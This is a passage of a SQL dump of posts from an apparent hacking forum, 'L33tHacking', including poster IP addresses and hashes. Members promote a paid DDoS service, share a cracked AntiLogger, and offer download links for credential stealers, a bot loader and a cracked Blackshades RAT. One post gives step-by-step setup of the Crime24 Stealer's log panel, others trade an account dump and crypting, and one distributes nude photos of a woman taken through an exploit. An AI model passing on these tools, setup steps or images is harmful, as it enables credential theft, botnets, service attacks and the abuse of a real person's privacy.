85.185.45.13:80\r\n85.185.45.12:80\r\n219.75.27.11:80\r\n78.189.194.214:8080\r\n74.208.204.187:80\r\n67.55.121.217:8118\r\n61.55.173.55:8080\r\n61.55.141.12:80\r\n61.55.141.10:80\r\n61.181.22.156:80\r\n61.164.160.30:80\r\n218.108.242.124:80\r\n180.246.57.97:80\r\n60.28.250.194:82\r\n60.11.169.132:8080\r\n59.188.19.197:8080\r\n58.63.224.74:80\r\n218.108.168.165:82\r\n58.251.57.78:8001\r\n218.108.168.138:80\r\n5.39.37.139:808\r\n5.152.195.199:808\r\n49.212.192.166:3128\r\n218.108.168.136:82\r\n46.211.75.138:54321\r\n218.108.168.130:82\r\n218.108.168.130:80\r\n202.198.17.141:8080\r\n222.74.212.66:808\r\n222.39.80.18:808\r\n202.159.226.227:8080\r\n217.196.164.61:3128\r\n217.70.39.123:3128\r\n202.55.5.245:8081\r\n203.151.17.97:8080\r\n221.6.15.156:82\r\n216.66.72.137:8080\r\n221.4.163.84:80\r\n221.238.153.236:80\r\n221.204.184.81:81\r\n216.244.71.143:8080\r\n219.224.27.141:808\r\n219.223.252.165:80\r\n219.142.225.87:8080\r\n218.94.1.166:82\r\n218.89.108.57:80\r\n218.29.131.11:3128\r\n216.226.190.155:8080\r\n218.204.131.250:3128\r\n218.108.242.107:3128\r\n218.108.168.166:80\r\n216.15.178.23:3128\r\n218.108.168.165:80\r\n218.108.168.138:82\r\n212.33.245.235:3128\r\n211.167.112.18:80\r\n218.108.168.136:80\r\n211.167.112.18:82\r\n203.174.78.243:80\r\n203.174.78.243:8081\r\n211.167.112.15:82\r\n203.98.145.234:80\r\n203.201.161.73:3128\r\n216.244.71.143:3128\r\n210.184.6.231:80\r\n216.226.190.155:80\r\n216.15.178.23:8080\r\n211.167.112.15:80\r\n212.45.5.172:3128\r\n211.157.104.100:80\r\n211.154.83.37:82\r\n210.51.17.73:80\r\n210.14.70.21:81\r\n210.22.151.78:80\r\n211.144.76.7:8181\r\n209.88.88.40:80\r\n187.121.90.157:8080\r\n[/code]\r\n\r\n\r\nEnjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '308b7bbed322523fe8ef2adf50bd79fb', '0', '0'); INSERT INTO mybb_posts VALUES('2833', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '1', 't3h jok3r', '1348954751', 'Thanks. He took a random website for me. Vouch!\r\n\r\nhttp://i.imgur.com/CWBFc.png', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b10fc0ab32dac65c13213165a4b7b681', '0', '0'); INSERT INTO mybb_posts VALUES('2834', '581', '0', '15', '[CRACKED] Zemana AntiLogger 1.9.3.208 [WITH UPDATES]', '0', '203', 'NeonLights', '1348954819', '[align=center][img]http://3.bp.blogspot.com/-CC45-US0XCg/UEdDZHYrnZI/AAAAAAAAAqw/XcS6k_bZpMg/s400/e59b2decdeaf8669fe58a1449ab96341.jpg[/img]\n\nZemana AntiLogger 1.9.3.208 | 9.1 Mb\n\nAnti-Logger, developed to deal with different kinds of malware threats, protects your banking passwords, private emails & chat conversations from spying proactively without needing a signature-based algorithm and includes powerful, anti-action methods.AntiLogger prevents all known forms of malwares which intend to carry out information theft.\n\nAs AntiLogger uses a proactive and a unique way to detect potentially harmful applications which have not already been recognized or identified by any anti-virus programs consequently, it protects your \'Information Security\' from a range of threats.Modules: Anti-SSL Logger, Anti-WebCam Logger and Anti-ClipBoard Logger are the first security solutions developed in the world. Also, you will realize that these modules have the best features if compared to similar applications.Anti-KeyLogger Module provides a new powerful protection against keyloggers which have not been even caught by known, the most popular security softwares in the world.\n\nHere are some key features of \"Zemana AntiLogger\":\n· Anti-SSL Logger Module that provides protection against SSL Logger\n· Anti-WebCam Logger that provides protection against WebCam Logger\n· Anti-Key Logger Module that provides protection against Key Logger\n· Anti-Screen Logger that provides protection against Screen Logger\n· Anti-Clipboard Logger that provides protection against ClipBoard Logger\n· System Defence Module that protects your system\n\nHow to use:\n\n-install zemina antilogger\n-run the keygen in the extra foler\n-copy the key and register it inside of zemina\n-boom u got 3 years of free usage :)\n\n[lock]download: http://adf.ly/382489/http://ge.tt/9r42UBN/v/0?c?c[/lock][/align]', '67.68.75.193', '1128549313', '1', '0', '1', '1352011584', '1', '777c05d8ad612d82c0c2cf10578bcaf0', '0', '1352011584'); INSERT INTO mybb_posts VALUES('2835', '582', '0', '15', 'RobotStealer Free Stealer', '0', '203', 'NeonLights', '1348954936', '[align=center][img]http://i.imgur.com/vk92Y.jpg[/img]\r\n\r\n It uses http (php) to upload the logs. That means you need a website to use this stealer, (Dropbox can\'t be used, since you need a htaccess file, to stop anyone from entering the upload folder. why did I use http instead of smtp or ftp: Because that way there\'s no stored login information in the binary compiled file, so even your stealer should be decompiled, you won\'t be able to get hacked.\r\nThe output file is 4 kb. and it will download the stealer itself, and run it, then upload the logs to your site, that way I can always update it, and make it FUD, in case it should become detected\r\n\r\ndownload: http://adf.ly/382489/http://ge.tt/38y1EkN/v/2?c\r\ndownload 2: http://adf.ly/382489/http://www.mediafire.com/?c1a9521snzihuub[/align]', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '05f743cdfa72ce4dc96b3e67cf10f711', '0', '0'); INSERT INTO mybb_posts VALUES('2836', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1348955080', 'I updated the link. L33THacking is there just no banner.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8633d55df655412fbc523c6a4c87b51b', '0', '0'); INSERT INTO mybb_posts VALUES('2837', '567', '2811', '16', 'RE: How to SE McDonalds', '0', '1', 't3h jok3r', '1348955658', 'Threw away with the food? I don\'t think it would work but there is a possibilty that it would.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9add3037713170f11f81075ca7b95cbc', '0', '0'); INSERT INTO mybb_posts VALUES('2838', '569', '2813', '74', 'RE: 21,000 Minecraft Account Dump', '0', '1', 't3h jok3r', '1348956087', 'http://l33thacking.net/misc.php?action=help&hid=13\n\nYour welcome! ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '016948a85e9e6ce7f31d1b4905b68fc1', '0', '0'); INSERT INTO mybb_posts VALUES('2839', '565', '2824', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '1', 't3h jok3r', '1348956607', '[quote=\'NeonLights\' pid=\'2824\' dateline=\'1348943126\']\r\n[quote=\'GRONgamer61\' pid=\'2822\' dateline=\'1348941886\']\r\nOh, well in that case it may not be FUD, again I just got this from HF.\r\n[/quote]\r\n\r\nalright :) was just checking cuz ive used chrom before and there products arent the best but nice share anyways\r\n[/quote]\r\n\r\nChrome crypter has two different versions. 1 is the public one which is not FUD and updated once in a while and 1 is a private one which is for sale and updated every month.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2fa328100151684ce6db2947e3c4a52', '0', '0'); INSERT INTO mybb_posts VALUES('2840', '398', '2833', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348958198', '[quote=\'t3h jok3r\' pid=\'2833\' dateline=\'1348954751\']\r\nThanks. He took a random website for me. Vouch!\r\n\r\nhttp://i.imgur.com/CWBFc.png\r\n[/quote]\r\n\r\nCool.\r\n\r\nAlso, you got a Mac? Nice! Why did you bookmark EliteLobby? :p\r\n\r\nAlso, might wanna censor some of your tabs/bookmarks? Etc. I see parts of your email.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3d2f6ef35b22b4300b9985d607350fd', '0', '0'); INSERT INTO mybb_posts VALUES('2841', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1348958320', 'Thanks.\n\nVoted for L33tHacking.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2bdde7977bf6ee036a3c01712edbad81', '0', '0'); INSERT INTO mybb_posts VALUES('2842', '567', '2811', '16', 'RE: How to SE McDonalds', '0', '82', 'iTzIpod', '1348958373', 'That\'s just my method. It works where I live. So I decided to share it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '26bebeb1d121aeea1094fd88b2c69a1e', '0', '0'); INSERT INTO mybb_posts VALUES('2843', '515', '2841', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1348960318', '[quote=\'iTzIpod\' pid=\'2841\' dateline=\'1348958320\']\r\nThanks.\r\n\r\nVoted for L33tHacking.\r\n[/quote]\r\n\r\n\r\nThanks for the vote but only unique votes count.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c78d36f7454fec9020c8637a5ba67c18', '0', '0'); INSERT INTO mybb_posts VALUES('2844', '583', '0', '17', '500+ pictures of same girl E-Whore pack', '0', '82', 'iTzIpod', '1348960805', 'Got this from the UploadNSell Exploit.\r\nGirl is actually decent looking. :hurr:\r\n\r\nWhat is included:\r\nOver 500 images of a girl, nude and not. Good quality images, girl 7/10 in my book. Have fun with whatever you use this for!\r\n\r\nPreview\r\n[spoiler][img]http://desmond.imageshack.us/Himg805/scaled.php?server=805&filename=picture255u.jpg&res=landing[/img][/spoiler]\r\n\r\n29.8 MB file, and there\'s not even AdFly, just a straight link to uppit :) enjoy!\r\n[url=http://uppit.com/bkv1qlu6m5n1/my_cam_pics.rar][color=#32CD32]ClickToDownload[/color][/url]\r\n\r\n\r\n[color=#FF0000][url=http://anubis.iseclab.org/?action=result&task_id=13aed453ac00bbca45190fd9498db73ca&format=html]VirusScan[/url][/color]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2f499f2a5f1dc06e006db96c87aca9f4', '0', '0'); INSERT INTO mybb_posts VALUES('2845', '569', '2813', '74', 'RE: 21,000 Minecraft Account Dump', '0', '82', 'iTzIpod', '1348960839', 'I don\'t get what you mean on this? :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9198d47f8d81218f6f4ed62cb714a99', '0', '0'); INSERT INTO mybb_posts VALUES('2846', '584', '0', '24', 'Windows 8, will you switch over?', '0', '205', 'mothered', '1348960856', 'Greetings everyone,\r\n\r\nAs the thread\'s title reads, will you make the switch over to Windows 8, or have you done so already?\r\n\r\nI have the RTM (Release to Manufacturer) version of Windows 8 Installed on 2 lappies, and love It. I\'ve heavily customized It via the Registry, added a Start menu, made It boot straight Into the desktop, added the Sidebar gadgets, and the list goes on.\r\n\r\nHow about you guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'fcac4b0c9865d10cebfd35a2b0f9ea3d', '0', '0'); INSERT INTO mybb_posts VALUES('2847', '576', '2828', '15', 'RE: The Ultimate HACK PACK', '0', '61', 'NXK', '1348961185', '[mod]Closed due to possible infections[/mod]', '99.253.94.204', '1677549260', '1', '0', '1', '1349235274', '1', '28521410ce2565e1b8a513a935451de7', '0', '1349235274'); INSERT INTO mybb_posts VALUES('2848', '585', '0', '24', 'Post your specs', '0', '205', 'mothered', '1348961210', 'Greetz everyone,\r\n\r\nHere\'s the specs of my lappy which I purchased not too long ago. It also has a 2GB GT540M dedicated V/C and 750GB H/D. Yeah, Windows 7 Home Premium Is not too flash, but who cares. It only misses a few features of the more superior editions. The ram Is certainly Impressive though.\r\n\r\nScreenie:\r\n[URL=http://imageshack.us/photo/my-images/204/myspecsz.png/][IMG]http://imageshack.us/a/img204/1623/myspecsz.png[/IMG][/URL]\r\n\r\nLet\'s see yours...', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '560b43b388f3508de805a0f22c45173b', '0', '0'); INSERT INTO mybb_posts VALUES('2849', '586', '0', '5', 'Mod code', '0', '61', 'NXK', '1348961238', '[mod]Hi[/mod]\r\n\r\nIsn\'t working again!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '38105ed75f72f3706509d11008b23b2c', '0', '0'); INSERT INTO mybb_posts VALUES('2850', '526', '2637', '3', 'RE: New Smilies', '0', '205', 'mothered', '1348961340', 'I must say that I like them.\r\n\r\nThey\'re certainly different, and beat the ones defaulted. \r\nWell done.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '085768eac4f0254bcff3f1b43bddd9ba', '0', '0'); INSERT INTO mybb_posts VALUES('2851', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1348961471', 'Yeah I saw that bookmark earlier I just took it off, I have NO idea how it got there xDD I don\'t even go on elite lobby. Also, that email is one of the ones I use for my Keylogger, so I don\'t care if people see it.\n[hr]\nOnline and taking orders!', '98.216.185.125', '1658370429', '1', '0', '100', '1349025781', '1', '9750ae9711622f299dd745cd0fc70651', '0', '0'); INSERT INTO mybb_posts VALUES('2852', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '205', 'mothered', '1348961493', 'I\'m probably a lot older than most members here (still have the mentality of a teenager though!), so I\'m Into hard rock and heavy metal.\r\n\r\nDon\'t mind the occasional rap though.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4b4ea30fa2a515a1aff40c688743a3b5', '0', '0'); INSERT INTO mybb_posts VALUES('2853', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1348961784', 'Don\'t worry. I won\'t make fun of anyone hopefully on this forum. \nI got a friend that\'s about 21 or 22 and listens to those genres! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f23ad4af7de2289f753f8637312fe9a9', '0', '0'); INSERT INTO mybb_posts VALUES('2854', '587', '0', '65', 'Who likes the Rocky Films?', '0', '205', 'mothered', '1348961805', 'Greetings L33thacking,\r\n\r\nSo who likes the Rocky films? I can watch them over and over again, and never get bored. Although I don\'t think much of Rocky V, I still don\'t mind watching It....\r\n\r\nAlso, which one\'s your favorite?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'fdbb1f168bba965acaa65f3f92569110', '0', '0'); INSERT INTO mybb_posts VALUES('2855', '559', '2796', '3', 'RE: Upgrade Price Lowered', '0', '1', 't3h jok3r', '1348961845', '[quote=\'iTzIpod\' pid=\'2796\' dateline=\'1348920964\']\r\nNice update. You got a point. When L33tHacking becomes big, lets try making it $10 again. And then maybe $15. \r\n\r\n\r\nUpgrade Section is kinda dead right now. So it\'s not really worth it at the moment. Unless we gain a lot more active members that will post HQ stuff.\r\n[/quote]\r\n\r\nTrue, it\'s inactive but we sure do have a lot of great content and don\'t forget the privileges you get after upgrading ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a9322e1729e91a94ac05aaa63bed10ff', '0', '0'); INSERT INTO mybb_posts VALUES('2856', '526', '2850', '3', 'RE: New Smilies', '0', '1', 't3h jok3r', '1348961892', '[quote=\'mothered\' pid=\'2850\' dateline=\'1348961340\']\r\nI must say that I like them.\r\n\r\nThey\'re certainly different, and beat the ones defaulted. \r\nWell done.\r\n[/quote]\r\nTrue, they sure do beat the default ones plus the default ones have a white BG in black themes.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'addb6b248402376cdf515da5f0ccd240', '0', '0'); INSERT INTO mybb_posts VALUES('2857', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '205', 'mothered', '1348962050', 'Let\'s get It to the 3k mark guys.\r\n\r\nGetting there...:)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1a98fff2bf1bdd0c3fba1c22ec7c5ff3', '0', '0'); INSERT INTO mybb_posts VALUES('2858', '586', '2849', '5', 'RE: Mod code', '0', '1', 't3h jok3r', '1348962075', 'It\'s working to me, are you sure?\n\n[b]Edited[/b]\n\nThe letter \"M\" should be capital in the mycode.', '72.231.24.165', '1223104677', '1', '0', '1', '1348962679', '1', 'f7fa0e79c54085690d6781edb415b9cd', '0', '1348962679'); INSERT INTO mybb_posts VALUES('2859', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '100', '??zg???g????61', '1348962120', 'Very HQ post thanks a ton bro!', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', '29507b91ea7b98e0cd3c89afe86a2dd6', '0', '0'); INSERT INTO mybb_posts VALUES('4170', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349904586', 'I know a guy that will crypt for $1', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '906d9a0241f7714cc7b715806da5fc51', '0', '0'); INSERT INTO mybb_posts VALUES('4171', '789', '4106', '19', 'RE: ratters', '0', '62', 'R?????zo?', '1349905160', 'that would be cool :D\nyou have to give me his contact', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8477b9f51debb2e0397824799a19b417', '0', '0'); INSERT INTO mybb_posts VALUES('4172', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '62', 'R?????zo?', '1349905205', 'Thanks for this, I think I will start using this instead of DC.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9f78cf905929d40366e40b6ab48db1e6', '0', '0'); INSERT INTO mybb_posts VALUES('4173', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349905967', 'Alright. I\'ll tell him your interested when hes next online.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9570ae7e34f4433dfa5d5c008113ce06', '0', '0'); INSERT INTO mybb_posts VALUES('4174', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '203', 'NeonLights', '1349906330', 'yea u should :)\ni stopped using dc \nmake sure ur ports are tcp and udp when using BS or it might not work', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '18702f1f1c574918bbee90ea666a6557', '0', '0'); INSERT INTO mybb_posts VALUES('4176', '788', '4122', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '3', '??????????¢™', '1349909098', '[quote=\'t3h jok3r\' pid=\'4122\' dateline=\'1349843007\']\r\n[quote=\'??????????¢™\' pid=\'4119\' dateline=\'1349842486\']\r\nYep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists.\r\n[/quote]\r\n\r\n:roflol: You seriously made me laugh. Thanks for it, I was hand-writing a 3 page essay and after all the hard work I deserved a laugh because I needed to cheer up.\r\n\r\nI agree it\'s all because of our active members. Thanks a lot to everyone. When I get the awards plugin back I will give a free award to everyone who has 5+ posts, any award of their choice except donation and upgrade awards.\r\n[/quote]\r\n\r\nLOL You laughed because I said \"Thanks to everyone except Anarchists.\" Huh?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '2733e679479bd13fa644d8e2ba7a280f', '0', '0'); INSERT INTO mybb_posts VALUES('4177', '801', '0', '7', '[IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '100', '??zg???g????61', '1349909362', 'So there are already these countless articles out there, explaining in detail what exactly Bitcoin is and how exactly it works in the technical sense, but I still get the sense that people don\'t really understand it. That\'s why I decided to make this short Bitcoin for dummies piece, where I\'ll explain in very simple layman terms roughly what it is and how it works and perhaps why you should research it further.\r\n\r\nBasic description\r\n\r\nAnd having said that, lets get right to it, but before I get into anything else I just want to clarify what Bitcoin is. The best way to sort of describe it is by comparing it to money in a video game. Just like say gold in World of Warcraft Bitcoin is a fictional, basically made up money on the computer. It\'s using it\'s own software for generating, maintaining, securing and transferring of Bitcoins and even though you can already transfer them physically they do not exist outside of a computer chip in a physical form.\r\n\r\nNext I want to look at the terms that are most often used to describing Bitcoin: a decentralized digital p2p crypto-currency\r\n\r\nLet\'s start with decentralized. Unlike WoW gold which you can earn while playing the game Bitcoins are not being created and regulated by a main server or a central authority. With our example WoW the central authority is Blizzard, the producer of the game, who owns the servers, which you as a player connect to when you play the game. And it is these servers that decide how much of gold there is at any point in time and how players can earn it. With Bitcoin on the other all the rules are already embedded into the client you install on your computer. These rules were preset when Bitcoin was developed and cannot change anymore. If someone connects to the network they have to use a client that obeys these rules or they\'ll get ignored by the rest. So the only way to ever change the rules is to have the entire network switch to your client with your new rules.\r\n\r\nI don\'t want to delve into the economical or political implications of this type of a design, I just want you to be able to understand how it works.\r\n\r\nThe next term is digital, which we already covered and as we said it means it exists solely on computers just like WoW gold.\r\n\r\nNext we have peer to peer which is what p2p stands for. This term describes how the Bitcoin network communicates. A peer is someone in the network who is running the Bitcoin client. This client acts both as a client and as a server, which means that unlike in a centrally run network like the WoW game, where the clients all connect to a central server, in the peer to peer network clients form a network by connecting to each other.\r\n\r\nAnd then theres crypto which is short for cryptography which describes how Bitcoin is secured. Basically it\'s a way of hiding and securing data, which among other things is used with securing online banking, protecting government secret digital data, securing secure communication lines ect.\r\n\r\n\r\nNow that we have a basic understanding of it\'s main features and what Bitcoin actually is. Let\'s look at how it all ties together and why it works.\r\nAs we said Bitcoins are fictional, made up digital \"coins\" so you are probably asking yourself why couldn\'t someone just make up how many Bitcoins they have and cheat everyone else, especially if there is no central authority keeping track and keeping everyone honest. Well the reason they can\'t cheat lies in the next important part of it. In our WoW example it\'s the server which keeps track of every player\'s gold in it\'s own private database. Because Bitcoin is decentralized the database is public and a copy of it is downloaded on every single client. This in of itself does not keep everyone honest or secure but if you want to add a new entry to the database that says you received some coins, there are rules you have to follow or else when you send the new entry to the rest of the people for them to update their version of the database they\'ll reject it as invalid. These rules are really easy to check if they were followed and extremely hard or practically impossible to cheat. So in essence everyone is keeping everyone else honest.\r\nIn order to comply with one of those rules you have to sacrifice your processor speed for solving a difficult mathematical problem, so there is a reward system in place for those who contribute. Anyone who wants to add a new entry to the database has to first solve that problem. It\'s a meaningless problem, but with our current technology can\'t be cheated and is very easy to verify.\r\n\r\nThe solving of this problem is what the Bitcoin community dubbed as \"mining\". It\'s something you don\'t have to take part in order to able to use Bitcoin for transactions only and it\'s actually regulated through it\'s rules so that the more people \"mine\", the harder it is to solve the problem, where right now it\'s not even worth the electricity unless you have a good graphics card.\r\n\r\nThis problem solving is also random which means it\'s impossible to know how fast someone will find a solution. The faster your computer, the less time it will take but it\'s still random which means someone with a way slower computer can get lucky and beat you to it. Who ever finds this solution first, can then make a new valid entry to the database and as a reward receive some Bitcoins. When a solution is found and new entry made, that entry also called a block, is then sent to everyone in the network to verify and add to their version of the database. This process is also how all the Bitcoins that will ever exists are going to get created and distributed.\r\n\r\nBasically all these virtual fictional coins are within that database. The database is constantly updated by people who participate in the \"mining\" process. Every time a new entry or a block is added someone received some brand new Bitcoins. These blocks also contain all the transactions between people which happened since the last block was created.\r\nEvery coin in that database is attached to a pair of a public and private key. The person who owns a Bitcoin must have both the public key to which the Bitcoin is attached and the private key. It is these pairs of keys in a separate file on your computer called wallet.dat that determine the ownership. If you lose this pair of keys you lose your Bitcoin.\r\n\r\nThis hopefully roughly explains how Bitcoin works. Now let\'s look at why someone would value these \"coins\" and use them as money online:\r\n\r\n- they are extremely secure and are becoming increasingly so with the growing network of Bitcoin users.\r\n- you can store your wallet.dat file anywhere you\'d like: USB stick, DVD, CD, online email account, ect ect\r\n- they are like cash which means no chargebacks are possible, once you send them, you can\'t get them back unless someone sends them back voluntarily\r\n- the supply of Bitcoins is limited to just under 21mio, so thievery through the invisible hand of monetary inflation is not possible\r\n- unless someone gets a hold of your wallet.dat file, no one can stop you from using them\r\n- even if all transactions are public in the distributed database there is no way for anyone to know by just looking through the database who those \"coins\" belong to\r\n- with proper precautions it is possible to remain pseudo-anonymous while using Bitcoins\r\n- the Bitcoin network is practically impossible to shutdown by anyone\r\n- no need for middlemen gobbling up expensive fees and requiring being trusted with your personal info\r\n- client software is open source, meaning the code is freely available to everyone and anyone can see and double check, what it does', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '0ebc962c02ad4ff37baf2d2a235a3585', '0', '0'); INSERT INTO mybb_posts VALUES('2861', '589', '0', '15', 'Crime24 Stealer', '0', '203', 'NeonLights', '1348962837', '[align=center][img]http://4.bp.blogspot.com/-WpTc5uHd5Co/T50oOfX5FQI/AAAAAAAAAMY/XDd0kytqSBI/s640/mhk94rvvsyoa.jpg[/img]\n\nFeatures \n• Webpanel\n• PHP Check\n• FTP Check\n• Melt\n\nSteal:\n• Internet Explorer\n• Google Chrome\n• Mozilla Firefox 9/10\n• JDownloader\n• Steam User\n• Minecraft (FTP only)\n• FileZilla\n• Pidgin\n• Opera\n• MSN\n• ICQ\n\n[img]http://kepkezelo.com/images/lv9715jlj23l60xyp0g.gif[/img]\n\nConfiguration Crime24 Stealer :\n\n# Step 1:\nRegister In any Free Web Hosting like http://www.blackapplehost.com/register.jsp To obtain an FTP and a MySQL database for free.\n\n# Step 2:\nOnce your registration is complete, go to your panel : \"UserCP\".\nClick \"Create/delete MySQL database\".\n\nName the base as you wish, this will include your (username).\nIn this example my username is \"example\". \nClick \"Create Database\".Choose a password of your choice : \"passw0rd\" \nClick \"Create User\".\n\n# Step 3:\nOpen Crime24 StealerPHP Loggerindex.php and edit the part \"Configuration\".\nI\'ll show you my setup by following my example:\n\n$dbHost = \"localhost\"; // MySQL host => Leave it like that\n$dbUser = \"exemple_user\"; // MySQL username => Your username database\n$dbPass = \"passw0rd\"; // MySQL password => Your password database\n$dbDatabase = \"exemple_db\"; // MySQL database name => The name of your database\n\n$username = \"Votre-Login\"; // Login Username => Your login to connect to the panel logs\n$password = \"Votre-Pass\"; // Login Password => Your password to log in panel logs\n$logspage = 50; // Number of logs per page => Number of logs per page, leave it like that\n\n# Step 4:\nReturn On BlackAppleHost, Click \"File manager\" in the \"User CP\" and uploaded index.php & style.css\nAfter this, Crime24 Stealer is well established! You can view your logs at the following address: http://username.blackapplehost.com/index.php\nReplace \"username\" by login to your account BlackAppleHost.\n\n# Step 5:\nOpen Crime24 Stealer and fill the necessary information.\nURL : http://username.blackapplehost.com/index.php by replacing \"username\" by the login of your account BlackAppleHost. And Click Build Server \n\n[lock]download: http://adf.ly/382489/http://lh.rs/ez5eIWVcSm99\n\nOR\n\nmirror: http://adf.ly/382489/https://www.dropbox.com/s/ljmbjqmr3g014pi/Crime24-Stealer.FreeHackTools.Com.rar[/lock][/align]', '67.68.75.193', '1128549313', '1', '0', '1', '1352011353', '1', 'a5774bafc427508b93ce6cca651d9e27', '0', '1352011353'); INSERT INTO mybb_posts VALUES('2863', '591', '0', '21', 'Amicitia Bot Holder', '0', '203', 'NeonLights', '1348963275', '[align=center][img]http://3.bp.blogspot.com/-E48xpdMRTqA/T-sebbj4SQI/AAAAAAAAAYs/B0Jz4QwSeRI/s400/EsYqd.png[/img]\r\n\r\nWhat is Amicitia?:\r\nAmicitia is a light-weight \"bot holder\" that can hold 100+ amout of bots, and then download and execute files on them.\r\nThe server size is at 36KB with only one feature, and thats to download & execute.\r\nYou can view their active window, and thats all.\r\n\r\nWhen download & executing, you will get a report on how many that successfully executed the file, and how many that failed.\r\n\r\nThis bot is great for users that want to build up with I4I\'s! once you get ur required amout of servers, just download and execute ur RAT server.\r\n\r\nWhy Amicitia?:\r\nVb6, No dependecies.\r\nLight-weight\r\nStable\r\nFREE! :)\r\n\r\n[img]http://4.bp.blogspot.com/-pyK1481xTP4/T-sevi_B3OI/AAAAAAAAAY0/Wgtqlo1NP0w/s320/2WtAm.png[/img]\r\n\r\ndownload: http://adf.ly/382489/http://www.mirrorcreator.com/files/WKQMNZKI/Amicitia_release_By_FreeHackTools.Com.rar_links[/align]', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '07b7acbdcbe8913232981ae772f48350', '0', '0'); INSERT INTO mybb_posts VALUES('2864', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '100', '??zg???g????61', '1348963496', 'Sounds good ;D I\'ll tell some people', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', 'b4a400584f4a0ac0539d0bbd26345e7f', '0', '0'); INSERT INTO mybb_posts VALUES('2865', '592', '0', '11', 'Lifehacker: The Guide to Working Smarter, Faster, and Better', '3', '203', 'NeonLights', '1348963578', '[align=center][img]http://3.bp.blogspot.com/-2qEzCq1gvXo/UE8n2IO9nwI/AAAAAAAAArY/BKAp8AcxerU/s400/51atkIMA2AL.jpg[/img]\r\n\r\nLifehacker: The Guide to Working Smarter, Faster, and Better\r\nAdam Pash, Gina Trapani | Wiley | English | EPUB + PDF\r\n\r\n\r\nA new edition, packed with even more clever tricks and methods that make everyday life easier\r\nLifehackers redefine personal productivity with creative and clever methods for making life easier and more enjoyable. This new edition of a perennial bestseller boasts new and exciting tips, tricks, and methods that strike a perfect balance between current technology and common sense solutions for getting things done. Exploring the many ways technology has changed since the previous edition, this new edition has been updated to reflect the latest and greatest in technological and personal productivity.\r\nThe new \"hacks\" run the gamut of working with the latest Windows and Mac operating systems for both Windows and Apple, getting more done with smartphones and their operating systems, and dealing with the evolution of the web. Even the most tried-and-true hacks have been updated to reflect the contemporary tech world and the tools it provides us.\r\n\r\nHacks include:\r\nHack 1: Empty Your Inbox (and Keep It Empty). \r\nHack 2: Decrease Your Response Time. \r\nHack 3: Craft Effective Messages. \r\nHack 4: Highlight Messages Sent Directly to You. \r\nHack 5: Use Disposable Email Addresses. \r\nHack 6: Master Message Search. \r\nHack 7: Future-Proof Your Email Address. \r\nHack 8: Consolidate Multiple Email Addresses with Gmail. \r\nHack 9: Script and Automate Repetitive Replies. \r\nHack 10: Filter Low-Priority Messages. \r\nHack 11: Organize Your Documents Folder. \r\nHack 12: Instantly Retrieve Files Stored on Your Computer. \r\nHack 13: Overhaul Your Filing Cabinet. \r\nHack 14: Instantly Recall Any Number of Different Passwords. \r\nHack 15: Securely Track Your Passwords. \r\nHack 16: Tag Your Bookmarks. \r\nHack 17: Organize Your Digital Photos. \r\nHack 18: Corral Media Across Folders and Drives. \r\nHack 19: Create Saved Search Folders. \r\nHack 20: Create a Password-Protected Disk on Your PC. \r\nHack 21: Create a Password-Protected Disk on Your Mac. \r\nHack 22: 